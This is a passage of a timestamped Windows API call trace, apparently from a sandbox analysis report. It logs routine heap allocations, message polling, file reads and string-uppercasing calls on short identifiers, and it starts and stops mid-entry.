lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0256.450] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.450] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0256.451] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0256.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0256.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.451] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0256.451] ReadFile (in: hFile=0x1f8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x2c40, lpOverlapped=0x0) returned 1 [0256.452] ReadFile (in: hFile=0x1f8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0256.452] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0256.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x2c40) returned 0x34a4048 [0256.453] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.453] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0256.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0256.453] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0256.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0256.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2088 [0256.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0256.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x2c40) returned 0x34a4048 [0256.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0256.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1198 [0256.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0256.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0256.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0256.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c18 [0256.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa950 [0256.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0256.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0256.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x2c40) returned 0x3571018 [0256.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0256.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0256.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0256.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0256.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0256.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0256.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0256.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0256.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0256.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0256.456] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0256.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0256.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0256.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0256.456] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0256.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0256.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0256.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.457] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.457] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0256.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0256.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0256.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0256.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0256.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0256.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0256.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.458] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0256.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0256.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0256.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0256.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0256.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0256.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.459] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0256.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0256.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0256.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0256.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0256.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0256.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0256.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0256.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0256.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.460] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0256.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0256.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0256.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0256.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.461] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0256.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0256.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0256.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0256.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0256.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.462] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0256.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.462] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0256.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0256.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0256.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.462] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0256.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0256.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0256.463] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0256.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0256.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.463] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.463] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0256.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0256.463] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0256.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa740 [0256.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0256.464] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0256.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.464] RtlAllocateHeap 